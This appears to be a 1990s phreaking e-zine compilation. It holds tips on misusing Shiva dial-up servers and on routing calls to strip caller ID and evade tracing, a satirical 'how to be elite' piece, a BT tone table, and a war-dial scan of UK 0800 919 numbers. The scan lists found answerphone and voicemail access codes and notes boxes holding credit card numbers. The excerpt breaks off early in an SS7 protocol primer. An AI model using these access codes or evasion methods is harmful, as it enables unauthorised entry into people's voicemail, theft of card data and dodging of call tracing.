If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to simultaneously dial out across the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. Using the connect command will give you control over the system modems, then you can dial out as if you were in terminal mode. If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or to stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dial up to the system directly. The mistake people make when it comes to ANI or CLID is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong*: the ANI service can be set up by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationally, so your originating CLID gets stripped at intra-LATA boundaries on the PSTN. A technique which I don't wanna give out involves trunk and carrier hopping.

Well, that's about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com; they will have technical guides in pdf format, and you can also download the Shiva software from their ftp site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp.
[b4b0] gr1p t1p.
#9x #darkcyde Efnet.
backa xio.
Bodie (the elite geezer who supplies all my internet needs and is generally the elitest bloke in the world)
[D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress.
KJ+usOOkNUvYGJ+HlkpRNSSg0GO1ds/WLr2D647qJVrSKqzt7FJ9WQc3DNLIWqtL BDiaQC8tSGhynRMZdp2nO0awKOY/EdefyzE/5sBhxj0ZdrxKLnvCdUO+nDivpZiR 6jM/kj/KeOXjqOfCipqFD4g8MqW40xskXtm2e1GCoku5iVwzqQp4nPcH8Zcpg25B KHleuBpdTf+BbYrtYmpPnmMhWdcURHJQrBcW9BIMEW0UrzAqE8wdCQNomJdz3ppf K1Ncr/6T1pZ+95pyZdu1D3TEuRuNXWLbSuQMOUncMDprqN/I/TSsNCPJfDeWtOoV qGZ9/Ud5yJoRsanWVxbrnav/Nr7TKtDYU2aP5rET+5t00LZTEWfnzmev6hQyWLO+ gZQ4mCIIYduEiwCfGjd/onq2QWdysW7eh4Uktu8zOyNeYABrjELIZRkoGXhJrMEi iQA/AwUYNr9/ao+2nUtUk/sHEQL9fQCgl9QLwXKnfUeiTeKucnANqDQnctsAniLL l8+4/uZr0QO0daLIePeRexhrmQENAza/N1cAAAEIANREM8G+yh0SmliGGB9FV0Zr Yk+5zKs5VZp5Cx9XLsb0k4dtiDxDAZKhLQMF2YeEoU6PvmRwQcEpz8XAJLPAjOyP ngxLMmp2uiFamudFOEE516Vs0at3UUNXGh7BJS9THbgwdRVQCsPKpSS6M6/4BbcX Kyde0TcLVkRUFUeBoQt1YbObwL74zgMhrrmyidii+EfL228wBW3eyApz5qL9g1nk BFPrMinfghw9SybA8NfkInj4RP41yJwcSb0Q9EzjI+mxsWG7rd31kwb060lP8BLu ZzHKnqKwO+oJMMow4+oWjqhGUbODEWOdPLPy3EOf9V5tgzItfPwu9MlfXKQqlT0A BRG0G2h5YnIxZCA8dGgwcm5AY29sZG1haWwuY29tPokBFQMFEDa/N1f0yV9cpCqV PQEBJLUH/i8EBENzw8A+XfXMzfLM+ry2hAa6qbLZCeo9bj76XzzHWviYXwkPAjSH X31ESZ7qqMVdb2NN4epLYD3J4ui7ygSZMw+DShQH62kCAfHXJwnvdI02ERn21gyT m4pzxQX26sjQQRdmlr+Z7KsYe4eNUlHlXwP15WggKr5D90PaWzx9vqomB1O4w0E1 W6GgTFXOurR/t2zoybJj8MJcS24LF8CKcpNHhsI0E5uBuyKIJwYRrlGvoUDAfuzR QxkliyLtyKsPwLuodCDVcgH13g80hrsGdPObPr+QUTluPwUTSQfoMturimswSKvp 7oRrJiSlVzrE1bEEhZR9hnFqogL6QXg= =lHXD -----END PGP PUBLIC KEY BLOCK----- *********************************************** * hybrid_blue@hotmail.com | DSS: 0x5493F1307 * * th0rn@coldmail.com | D-H: 0x8B314ED9 * * hybrid@darkcyde.org | RSA: 0xA42A953D * * th0rn@cyberspace.org | * * www2.dope.org/9x | 1999-02-09 * * www.darkcyde.8m.com | * *********************************************** ---(OOooOO)--------How to be 3l337--------------------------------------(OOo- ---(OOooOO)--------by force---------------------------------------------(OOo- ---(OOooOO)--------force007@hotmail.com---------------------------------(OOo- "well, secOnd by secOnd and minute by minute, its like lOttO, yOu gOtta be in 
it tO win it"

this file is for all of you newbies/lamers that wanna be as eleet as the people
who keep calling you names on that newsgroup. yes! it can be done! just follow
the simple steps below and you too will be able to call people names and make
yourself look good! what are you waiting for? get reading!

step 1
+======+
first of all you need to go down to blockbuster video and rent out Hackers and
Wargames. watch them both about 5O times, then you're ready for step 2

step 2
+======+
you really need a computer to be eleet, so beg your father to get one. tell him
you need it for homework. that's it! now you have a computer!

step 3
+======+
now you need to be able to access the internet, so tell daddy that all of your
friends can look at teletubbie websites and you feel left out

step 4
+======+
when daddy's gone out, connect to the internet. i know it's very difficult but
you have got that nice aol guide that came free with it, haven't you? that's it!

step 5
+======+
you can now search for hacking and phreaking with a search engine. choose the
one with the funny name, Yahoo! well done

step 6
+======+
go to all of the nice looking hacking and phreaking sites. read all of the
writing and look at all of the pictures

step 7
+======+
to be truly eleet you need a (00l-@$$ nickname/handle. either think of one
yourself or choose one from the following list.

 o zEr0 c00l
 o cRa$h 0VeRiDe
 o CeReAl KiLLeR
 o aCiD BuRn

the above names [as if you didn't know!] are from Hackers the film so they must
be eleet.

step 8
+======+
get yourself an account with hotmail or yahoo mail and use your new nickname, so
try to get something like this: zEr0_c00l@hotmail.com

step 9
+======+
open up your news server and read all of the posts in alt.ph.uk, alt.26OO,
alt.26OO.phreakz and alt.phreaking

step 1O
+=======+
it's time for you to make your first post to a newsgroup. i suggest alt.ph.uk.
look through all of the posts until you find one saying 'how do i get free
calls' or 'does red boxing still work?' reply to the group so everyone can see
how eleet you are. write something like this:

'y0 laMEr! y0u arE s0 laMe i tHiNk i'M g0nNa pUkE, wHy d0N't Y0u d0 s0mE
reSeArCh bef0re y0u p0sT sHiT LikE ThAt eVeR heArD oF a SEaRch eNgiNe? 0h
yeAh teLL y0uR MuM tHAt sHE 0wEs Me £1000000000000 f0r lAst niGHt l4m3r!'

step 11
+=======+
in case you don't already know, all eleet people write funny with 0's, 1's,
3's and 4's instead of letters. writing like that shows that you are truly
eleet. you may ask why i'm not writing like that, well to tell the truth i'm
not eleet, i wish i was but i'm not

step 12
+=======+
download mIRC and hang out in #phuk #2600-uk #evilhax0rs #phreak #hacking
#hackers and #2600. you should get to know the regulars in the above channels
and you will be able to go in there anytime and chat about how eleet you are.
and don't forget to call anyone you don't know lame and kick ban them straight
away, and ALWAYS remember to flame all posts made in alt.ph.uk, it will make
you look eleet and cool

step 13
+=======+
learn html and java and use your skills to build your own webpage. call it
'zEr0 c00l's eleet hax0r warez palace' and have loads of hacking phreaking
anarchy cracking virii warez stuff on there that you took from someone else's
site and pretend you wrote it. post the address to alt.ph.uk and tell them that
if they don't visit it they are lAmE-aSs pieces of shit

step 14
+=======+
now that you are well respected among other eleet people you should join a
hacking/phreaking group and hang out with the eleet peeps. if you can't find
one or nobody will let you join one, start your own and call it 'eleet hax0r
d00ds'

step 15
+=======+
hack into a big website and change the homepage to say 'zEr0 c00l w0z ere' and
leave your e-mail address, phone number and your home address. you will get
caught, arrested and put in prison without trial. this will make you look eleet
to everyone else and you will have achieved your aim!
people will have little banners on their webpages saying 'fReE zEr0 c00l!'
well done! but by now you will be way too eleet for this text file and will
have deleted it and sent me an e-mail telling me how lame i am. oh well...

---(OOooOO)--------BT tones and announcements---------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-

1. SCOPE
--------

This document describes the supervisory tones generated by the BT network and gives general information about BT network announcements. Tones and announcements encountered on the BT network can also come from other networks and from customer premises equipment; these are not covered in this document.

2. NETWORK SUPERVISORY TONES
----------------------------

The supervisory tones that will be returned from the BT network are listed in Table 1. Levels are as received at the BT network interface; tone frequencies are +/- 5% and cadence timings +/- 10% except where stated.

Table 1. Network Supervisory Tones

+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Network generated  | Significance         | Range of levels       | Tone            | Cadence                      |
| tone               |                      | received at BT        | composition     | (+/- 10% except              |
|                    |                      | network interface     | (+/- 5% except  | where stated)                |
|                    |                      |                       | where stated)   |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Proceed Indication | Proceed to dial      | 0 dBm to -27 dBm.     | 350 Hz plus     | Both tones continuous        |
| (Dial Tone)        | indication           | Each tone separately  | 440 Hz          |                              |
|                    |                      | 3 dB lower            |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Special Proceed    | Proceed to dial      | 0 dBm to -27 dBm.     | 350 Hz plus     | 350 Hz tone 0.75 s ON,       |
| Indication         | indication when      | Each tone separately  | 440 Hz          | 0.75 s OFF, plus 440 Hz      |
|                    | certain              | 3 dB lower            |                 | tone continuous; or both     |
|                    | supplementary        |                       |                 | tones pulsed at the above    |
|                    | services have been   |                       |                 | rate                         |
|                    | invoked              |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Number Busy Tone   | Called customer's    | 0 dBm to -37 dBm.     | 400 Hz          | 0.375 s ON, 0.375 s OFF      |
| (Engaged Tone)     | line in use          |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Congestion Tone    | Routeing equipment   | -6 dBm to -43 dBm.    | 400 Hz          | 0.4 s ON, 0.35 s OFF,        |
| (Path Engaged      | is temporarily       | 0 dBm to -37 dBm.     |                 | 0.225 s ON, 0.525 s OFF.     |
| Tone)              | unavailable          |                       |                 | Note: the shorter tone is    |
|                    |                      |                       |                 | 6 dB higher than the longer  |
|                    |                      |                       |                 | tone                         |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Special Congestion | Precedes some        | 0 dBm to -37 dBm.     | 400 Hz          | 400 Hz tone 0.2 s,           |
| Tone               | congestion           |                       | 1004 Hz         | 1004 Hz tone 0.3 s           |
|                    | announcements        |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Connection Not     | Call cannot be       | 0 dBm to -37 dBm.     | 400 Hz          | Continuous                   |
| Admitted           | routed to requested  |                       |                 |                              |
| Indication (Number | number               |                       |                 |                              |
| Unobtainable Tone) |                      |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Awaiting Answer    | Implies that the     | 0 dBm to -37 dBm.     | 400 Hz + 450 Hz | 0.4 s ON, 0.2 s OFF,         |
| Indication         | called customer's    |                       |                 | 0.4 s ON, 2.0 s OFF;         |
| (Ringing Tone)     | line is being rung   |                       |                 | or 0.35 s ON, 0.22 s OFF,    |
|                    |                      |                       |                 | then start at any point in   |
|                    |                      |                       |                 | 0.4 s ON, 0.2 s OFF,         |
|                    |                      |                       |                 | 0.4 s ON, 2.0 s OFF.         |
|                    |                      |                       |                 | Note: cadence does not       |
|                    |                      |                       |                 | necessarily coincide with    |
|                    |                      |                       |                 | the call arrival indication  |
|                    |                      |                       |                 | cadence                      |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Special            | Precedes certain     | 0 dBm to -37 dBm.     | 950 +/- 50 Hz   | Each frequency is sent for   |
| Information Tone   | announcements        |                       | 1400 +/- 50 Hz  | 330 ms +/- 70 ms in the      |
|                    |                      |                       | 1800 +/- 50 Hz  | order given, with silent     |
|                    |                      |                       |                 | periods of up to 30 ms       |
|                    |                      |                       |                 | between adjacent signals     |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Call Waiting       | Indicates a second   | 0 dBm to -37 dBm.     | 400 Hz          | 0.1 s ON, 2 s to 5 s OFF     |
| Indication         | incoming call        |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Special Call       | Indicates a special  | 0 dBm to -37 dBm.     | 400 Hz          | 0.25 s ON, 0.25 s OFF,       |
| Waiting Indication | second incoming call |                       |                 | 0.25 s ON, 0.25 s OFF,       |
|                    |                      |                       |                 | 0.25 s ON, 5.0 s OFF         |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Pay Tone           | Indicates credit     | 0 dBm to -37 dBm.     | 400 Hz          | 0.125 s ON, 0.125 s OFF;     |
| (Payphones)        | expiry to payphone   |                       |                 | continues for 11 s to 13 s   |
|                    | (and called)         |                       |                 | or until money is inserted   |
|                    | customer             |                       |                 | into the payphone            |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Acknowledgement    | Follows dialled      | 0 dBm to -37 dBm.     | 1600 +/- 50 Hz  | 0.5 s to 1.5 s               |
| Tone               | access code (e.g.    |                       |                 |                              |
|                    | 144) and precedes    |                       |                 |                              |
|                    | automatic voice      |                       |                 |                              |
|                    | prompt instructions  |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Confirmation Tone  | Used in some         | 0 dBm to -37 dBm.     | 1400 Hz         | 20 s followed by silence     |
|                    | exchanges in place   |                       |                 |                              |
|                    | of an announcement   |                       |                 |                              |
|                    | to indicate that an  |                       |                 |                              |
|                    | interrogated service |                       |                 |                              |
|                    | is active            |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+
| Switching Tone     | Used in some         | 0 dBm to -37 dBm.     | 400 Hz          | 0.2 s ON, 0.4 s OFF,         |
|                    | exchanges in place   |                       |                 | 2.0 s ON, 0.4 s OFF          |
|                    | of an announcement   |                       |                 |                              |
|                    | to indicate that an  |                       |                 |                              |
|                    | interrogated service |                       |                 |                              |
|                    | is not active        |                       |                 |                              |
+--------------------+----------------------+-----------------------+-----------------+------------------------------+

3. NETWORK ANNOUNCEMENTS
------------------------

A variety of announcements may be returned to a user during call set-up and clear down. Other announcements may be returned to the user during set-up, operation and cancellation of supplementary services and of services other than basic access to the Public Switched Telephone Network (PSTN) (e.g. Chargecard, 0345, 0800, 0898). Some announcements will be preceded by Special Information Tone. All announcements will have a mean level at the BT network interface in the range -14 dBm to -28 dBm and will be repeated for between 1 and 5 cycles.

---(OOooOO)--------UK scan of O8OO 919----------------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-

"where ya gOnna run when ya can't mOve further? 781 redrum with the murder"

Key:
 NA  = No answer
 B   = Busy/engaged
 M   = Modem/carrier
 VMS = Voice Mail System
 V   = Voice/picked up
 PBX = Private Branch eXchange
 p=  = answerphone remote-access (security) code (?? = not found)

000 Answerphone p=1819
001 VMS
003 V
004 V
005 V
006 Answerphone p=??
007 V
010 English Meridian Mail 3333-3333
011 V when busy, BT Call Minder p=????
015 V
018 V
021 V
022 V
023 English Meridian Mail
024 Company recording
029 Answerphone p=20
032 Answerphone p=??
036 Dead then "This number is temporarily out of order"
038 VMS box 4501 smi * to get in to the box
039 NA
040 V
042 NA
044 Strange answerphone p=?? responds to keypresses by beeping
045 NA
046 M - User Name Verification User Name:
048 NA
049 V "hello metro jamline"
051 NA
053 NA
054 Fax
056 NA
057 NA
058 Answerphone p=?? * cuts to the beep, 0 replays the ogm
066 V
068 Answerphone p=??
070 General Accident, put on hold, crap music
073 M - No response
077 V
079 VMS
080 V
082 NA
083 M - No response
084 Recording "operator is busy", put on hold
086 "The number called has been changed to 0181 blah blah"
089 Fax
090 Answerphone p=?? Lamppost repair line!
091 Fax
092 Answerphone p=2233
094 Recorded information on air pollution, answerphone p=1122?
099 M - Garbage AT~*^ AT&
100 NA
102 NA
107 Answerphone p=1122
108 V
110 NA
111 M/F
114 M - Shiva Lanrover System @user id:
116 "This number has changed to 0702 1162518"
117 Answerphone p=112233
118 NA
119 "The number called has been changed to 01904 643355"
120 NA
121 NA
122 NA
124 NA
125 Answerphone, press * for security code prompt, p=??
126 Answerphone p=?? you get transferred after a few attempts
127 Answerphone p=?? plays a cool tune
128 B
129 V some bloke SHOUTS at you
130 Answerphone p=2233 end of tape?
131 NA
132 V
133 Weird recording!? "No information available 807 bye"
134 Answerphone, press * for security code prompt, p=??
136 V "HELLO!"
139 Shitty VMS, i can't get a mailbox? prompt
140 NA
141 Recording "This service is currently unavailable"
142 V
143 Shit answerphone
145 V
146 Answerphone p=??
147 NA
148 V
149 NA
151 NA
152 M - Garbage
153 V
155 Company recording
157 M - Garbage
161 Fax
162 NA
164 NA
165 Fucked up answerphone
166 Answerphone p=??
168 V
171 NA
174 Answerphone for a mobile phone with the number 0402 663083, press * for a security code prompt, 4 digits
175 NA
177 NSPCC recording, maybe an answerphone there
179 NA
180 Answerphone p=??
182 NA
186 V
187 Forwarded to VMS 'Voice Connector'
188 Airtours crew delay line for Manchester
191 Put on hold, Shitehouse Family hold music
199 Answerphone p=??? three digit
201 Put on hold, no music!
202 V
203 B
204 M - Garbage
205 Answerphone p=??
206 V
208 V
209 NA
210 NA
211 NA
212 Fax
214 Answerphone p=??
216 NA
220 NA
221 Answerphone p=??
222 English Meridian Mail direct to box 4502
224 V
225 M - Garbage +++
226 Answerphone p=??
227 NA
228 NA
230 NA
231 NA
233 V
236 Forwarded to a fax
240 NA
243 NA
244 English Meridian Mail direct to box 4504, same system as above
245 NA
248 Answerphone p=*? after pressing * it responds to keypresses
249 Answerphone p=*? same as above
250 NA
254 NA
255 NA
258 V
259 Answerphone p=?? messages will have cc#'s on them
260 NA
261 Orange answerphone, can't get a passcode? prompt
262 NA
268 NA
269 Answerphone
270 Answerphone p=??
271 It says it's a voice mail system but it hangs up on keypresses
273 V "Hello, Jamline"
274 Answerphone p=??
275 GAP VMS AUDIX, couldn't locate the boxes
277 Airtours crew delay line for London Gatwick
280 V Sounded like a mobile phone or payphone
283 NA
285 M - No response
286 M - No response
287 M - No response
288 English Meridian Mail direct to box 4505, same system as above
289 VMS box 1000
290 NA
291 M - No response
292 NA
293 B
294 NA
295 PABX Peoples Bank
296 V Peoples Bank
300 Answerphone p=??
301 Stolen Credit Card Report Centre, English Meridian Mail, they must have disabled it coz you press # to stop recording but it won't give you a mailbox? prompt
303 Answerphone p=??
305 NA
306 NA
307 NA
308 Answerphone p=3345? around 2345 area
309 NA
311 English Meridian Mail direct to box 4506, same system as above
312 Answerphone p=#? i think # gets you in
313 Answerphone p=1?11?
316 Fax
317 Answerphone p=??
320 Answerphone p=*? press * then it responds to keypresses
321 English Meridian Mail
322 Answerphone p=??
325 NA
326 Answerphone p=?? # does something
327 NA
328 Answerphone/VMS p=?? it hangs up if you press * or #
329 NA
330 VMS AUDIX 5 digit boxes
331 VMS AUDIX 5 digit boxes
332 Company recording
333 Answerphone p=??? * to get security code? prompt, 3 digits
334 Fax
336 Weird recording loop "we can't recognize this mailbox number"
337 M - Enter Your User Name: quite a few attempts
338 NA
339 VMS AUDIX 5 digit boxes
340 NA
341 NA
342 BT Answerphone p=#?
343 V
347 "It has not been possible to connect your call"
353 Answerphone p=??
355 English Meridian Mail direct to box 4507, same system as above
356 Answerphone p=?? # does something
357 Answerphone p=?? * forwards you to somewhere?
359 Answerphone p=??
360 M - Garbage g~
361 M - Garbage *n~
362 V
365 NA
366 Airtours crew delay line for Bristol
367 Answerphone p=??
369 NA
370 V
371 PABX x100 x111 NA
372 NA
373 NA
377 NA
378 M - Call has been intercepted by Defender Security Server ID:
381 NA
385 Answerphone p=?? cool tune
386 NA
390 V
391 Answerphone p=?? messages will have cc#'s on them
392 M - Garbage +++
394 Answerphone p=?? cool tune
395 V
396 Answerphone p=??
397 NA
398 Weird DTMF tones then answerphone p=??
399 V BT! - All numbers between 400 and 499 emit a weird tone
501 NA
503 V
506 V
508 Forwarded to V
509 NA
511 Answerphone p=?? cool tune
514 Answerphone p=?? cool tune
516 NA
518 BT Call Minder
520 Answerphone p=?? cool tune
522 V
524 NA
526 NA
527 NA
528 NA
535 Recorded message
540 Answerphone p=??
543 NA
544 Airtours crew delay line for Belfast
546 Fax
548 M - Shiva Lanrover @ userid:
549 V
552 Answerphone p=22/33 area
553 Answerphone p=??
554 V
555 Answerphone p=31/32/33
558 Call waiting then V
560 VMS, press #, infinite attempts but i couldn't find any boxes
561 Forwarded to a fax
562 Answerphone p=4455 area
567 NA
568 English Meridian Mail direct to box 2254 00,50,51,53,55,56
570 Answerphone p=12?
572 Fax
575 M - Annex Command Line Interpreter - Annex Username:
576 V
582 NA
583 NA
584 Fax
585 Answerphone, press # then it responds to keypresses
587 Answerphone, press # for a security code? prompt, 5 digits
588 VMS AUDIX 5 digit boxes
591 BT recorded message
592 NA
593 V 'student village'
595 AA shitty PABX
596 English Meridian Mail 4444 40 39 38 36 4794
597 NA
599 Fax
602 V
603 Freephone dating service
608 English Meridian Mail direct to box 445 444 443- 440- 446- 447-
610 V
611 Airtours crew delay line for Newcastle and Glasgow
613 Recording "We are currently updating the system"
614 M - No response
616 NA
618 B
619 Answerphone p=?? one digit?
621 Forwarded to an op who asks for your message
622 NA
623 Recording "We are currently updating the system"
625 Answerphone p=??
627 BT Call Minder
628 NA
630 Answerphone p=?? sounded like it ran out of tape
631 Answerphone p=?? messages will have cc#'s on them
633 Freephone dating service
634 NA
635 VMS Phonemail box 322
636 NA
637 Answerphone p=??
639 Answerphone p=??
642 Answerphone, press #, responds to keypresses
643 Freephone dating service
644 M - No response
645 NA
646 NA
649 NA
651 NA
653 V
654 V woman asks if she can take your message
655 NA
657 Answerphone, press * then it responds to keypresses
658 Recording "We're sorry an error has occurred"
659 Same as above
660 Saga PABX shit
661 NA
662 Answerphone p=??
663 V
667 BT Call Minder
668 Answerphone p=?? messages will have cc#'s on them
669 NA
670 V
672 B&Q answerphone p=0
675 Answerphone p=456 area
677 Answerphone p=??
678 Company recording
679 PABX crappy job vacancy thing
681 Answerphone, * to get security code prompt, p=? one or two digits
684 NA
685 Answerphone p=?? * hangs up
689 NA
690 Answerphone p=16/17
692 NA
693 Recording "this service is being updated"
694 Freephone dating service
695 Same as above
696 VMS box 540 crappy system
699 NA
700 V
703 V
704 VMS AUDIX 4 digit boxes
705 Answerphone, # for security code? prompt
708 NA
709 Answerphone, * for security code
717 BT recording
719 NA
720 V
721 Answerphone for a Vodafone number 0467 764224, passcode 9999
722 Fax
723 NA
724 NA
728 VMS pretty shite
729 Answerphone p=??
730 "This is AT&T Communications, number not available"
733 Fax
735 NA
737 Answerphone, * for security code prompt
738 NA
739 NA
740 NA
742 English Meridian Mail direct to box 6208
744 BT Call Minder
746 WEiRD beeps on pickup then nothing, conference loop? maybe
748 NA
749 Answerphone p=??
752 V
754 V
755 VMS AUDIX 5 digit boxes
756 NA
759 Answerphone p=??
760 Fax
761 V
762 V
763 NA
764 V
765 Answerphone p=??
766 Answerphone p=?? someone picked up?
768 V
771 V
774 Answerphone p=??
776 NA
780 V
781 Answerphone p=??
783 Answerphone p=10
787 M
788 NA
790 Company recording
792 VMS AUDIX
793 NA
794 Company recording
795 Company recording
796 Company recording
797 NA
799 Airtours crew delay line for East Midlands
800 Company recording
804 Answerphone p=??
805 Company recording
806 Company recording
808 NA
811 NA
812 NA
814 Company recording
815 NA
816 NA
817 V
818 NA
819 NA
821 "You are being forwarded to a VMS but the user at extension 4888 does not subscribe to this service"
822 V
824 NA
825 PBX, press 3 for an English Meridian Mail
828 Answerphone p=??
829 Company recording
830 NA
833 WEiRD beeped on pick up then nothing
835 NA
836 NA
838 NA
839 Company recording
842 NA
843 BT Helpdesk answerphone, press * for security code? prompt
845 V
847 V
849 Company recording
850 NA
851 VMS, press # for mailbox? prompt
855 V "good morning jam line"
856 Answerphone
857 NA
859 Company recording
861 Royal Bank of Scotland answerphone, * does something
863 NA
865 "The person you are calling is not accepting anonymous calls, please redial without withholding your number"
866 Same as above
867 And again
868 And again
869 Answerphone p=??
872 Answerphone, BAD quality recording, cool tune, * does something
874 NA
875 NA
876 Company recording
877 NA
878 "The person you are calling is temporarily unavailable, please try later"
879 "The number called has been changed to 0171 9037001"
880 NA
882 BT recording "This service is not compatible with this call"
884 M
885 M
887 NA
888 Airtours crew delay line for Leeds, Bradford, Humberside, Aberdeen, Bournemouth and Edinburgh
891 Forwarded to the 121 Voice Mail Service, crap
892 VMS, same system as above
895 V
897 NA
900 Company recording - very sad
902 NA
905 B
906 Company recording
907 NA
908 Answerphone p=??
912 M
913 VMS OCTEL Direct 3 digit boxes
914 NA
917 Answerphone p=??
919 Answerphone p=??
920 V
922 Answerphone p=??
923 V "Hello?"
924 M
925 NA
927 Answerphone p=??
928 Same as above
930 VMS AUDIX
933 NA
934 BT "Calls to this number are being diverted", V
935 Answerphone p=??
937 V indian bloke actually started singing "bud bud ding ding"
940 Answerphone p=?? * does something
941 Answerphone p=??
944 Recording "No information available 806 bye"
946 Company recording
947 M/F
949 NA
950 Answerphone p=??
956 NA
958 V
959 Answerphone p=??
960 NA
962 NA
963 BT Call Minder
965 NA
966 NA
968 V
969 V
971 NA
972 V
973 NA
974 NA
976 NA
978 Answerphone p=??
980 NA
981 Answerphone p=??
983 Answerphone p=?? messages will have cc#'s on
986 NA
987 VMS AUDIX 5 digits
989 Some crap recording about rewards
993 M
994 Answerphone p=?? sounds like Mystic Meg
996 NA
997 Answerphone p=??
998 NA

shoutz: Bodie + Hybrid + Chimmy + Zomba + Downtime + All of the D4RKCYDE crew

"so, i've decided to take my work back underground, to stop it falling into the wrong hands..."

force007@hotmail.com
O8OO 919355 direct to vmb
iCQ 21O63199

---(OOooOO)--------Signaling System Number 7 - SS7----------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-

Signaling System Number 7 (SS7)
A Guide to the SS7 Telephony Protocol.
April 1999. By Hybrid. (th0rn@coldmail.com) (hybrid_blue@hotmail.com)

Everyone is still talking about 5ESS and 1AESS switch programming.
Whatever country you live in, Signaling System 7 has been, or _will_ be, implemented. I have written a load of files on the various protocols of SS7 and its many applications. I have written this file as a guide to the SS7 system and its network layout. This is _new_ information, not old 5ESS stuff. People are still going on about 5ESS and how they can hack ESS switches. Bullshit: SS7 is the new system, and it's time that phreaks started to look into this massive new network instead of lingering in the past. Before my time, phreaks could _phreak_ using just a phone; now if you want to take a CO, or a switch, you have to hack it. Since the advent of CCS (Common Channel Signaling) you cannot interact with the phone network from the voice path, because the signaling and the voice data are handled on separate networks. If phreaking is going anywhere, it is heading towards SS7 and AIN Frame Relay. I have obtained some information on the SS7 system from Bellcore and other major telco players. After reading the information (from books), I have decided to type it all up into a file for everyone to read. The information I have on SS7 is all in paper format, so I have merely copied it all into digital format, the way in which it should be. SS7 is a relatively complicated protocol to grasp, but if no one bothers with it _real_ phreaking will die. I hope everyone enjoys reading this file as much as I enjoyed typing it up; all the information in this file has been taken from technical books and journals, apart from the ASCII diagrams which I have made to make the info easier to understand.

Index: Signaling System 7 (SS7)

 1. What is Signaling?
 2. What is Out-of-Band Signaling?
 3. Signaling Network Architecture
 4. The North American Signaling Architecture
 5. Basic Signaling Architecture
 6. SS7 Link Types
 7. Basic Call Setup Example
 8. Database Query Example
 9. Layers of the SS7 Protocol
 10. What Goes Over the Signaling Link
 11. Addressing in the SS7 Network
 12. Signal Unit Structure
 13. What are the Functions of the Different Signaling Units?
 14. Message Signal Unit Structure
 15. Acronym List

1. What is Signaling?

Signaling refers to the exchange of information between call components required to provide and maintain service. As users of the public switched telephone network, we exchange signaling with network elements all the time. Examples of signaling between a telephone user and the telephone network include: dialing digits, providing dial tone, accessing a voice mailbox, sending a call-waiting tone, dialing *66 (to retry a busy number), etc.

Signaling System 7 is a means by which elements of the telephone network exchange information. Information is conveyed in the form of messages. Signaling System 7 messages can convey information such as:

 - I am forwarding to you a call placed from 212-555-1234 to 718-555-5678. Look for it on trunk 067.
 - Someone just dialed 800-555-1212. Where do I route the call?
 - The called subscriber for the call on trunk 11 is busy. Release the call and play a busy tone.
 - The route to XXX is congested. Please don't send any messages to XXX unless they are of priority 2 or higher.
 - I am taking trunk 143 out of service for maintenance.

SS7 is characterized by high-speed packet data and out-of-band signaling.

2. What is Out-of-Band Signaling?

Out-of-band signaling is signaling that does not take place over the same path as the conversation. We are used to thinking of signaling as being in-band. We hear dial tone, dial digits, and hear ringing over the same channel on the same pair of wires. When the call completes, we talk over the same path that was used for the signaling. Traditional telephony used to work in this way as well. The signals to set up a call between one switch and another always took place over the same trunk that would eventually carry the call. Signaling took the form of a series of multifrequency (MF) tones, much like touch tone dialing between switches.
Out-of-band signaling establishes a separate digital channel for the exchange of signaling information. This channel is called a signaling link. Signaling links are used to carry all the necessary signaling messages between nodes. Thus, when a call is placed, the dialed digits, trunk selected, and other pertinent information are sent between switches using their signaling links, rather than the trunks which will ultimately carry the conversation. Today, signaling links carry information at a rate of 56 or 64 kilobits per second (kbps).

It is interesting to note that while SS7 is only used for signaling between network elements, the ISDN D channel extends the concept of out-of-band signaling to the interface between the subscriber and the switch. With ISDN service, signaling that must be conveyed between the user station and the local switch is carried on a separate digital channel called the D channel. The voice or data which comprise the call is carried on one or more B channels.

Why Out-of-Band Signaling?

Out-of-band signaling has several advantages that make it more desirable than traditional in-band signaling:

 - It allows for the transport of more data at higher speeds (56 kbps can carry data much faster than MF outpulsing).
 - It allows for signaling at any time in the entire duration of the call, not only at the beginning.
 - It enables signaling to network elements to which there is no direct trunk connection.

3. Signaling Network Architecture

If signaling is to be carried on a different path than the voice and data traffic it supports, then what should that path look like? The simplest design would be to allocate one of the paths between each interconnected pair of switches as the signaling link. Subject to capacity constraints, all signaling traffic between the two switches could traverse this link. This type of signaling is known as associated signaling, and is shown below in Figure 1.
Figure 1: Associated Signaling

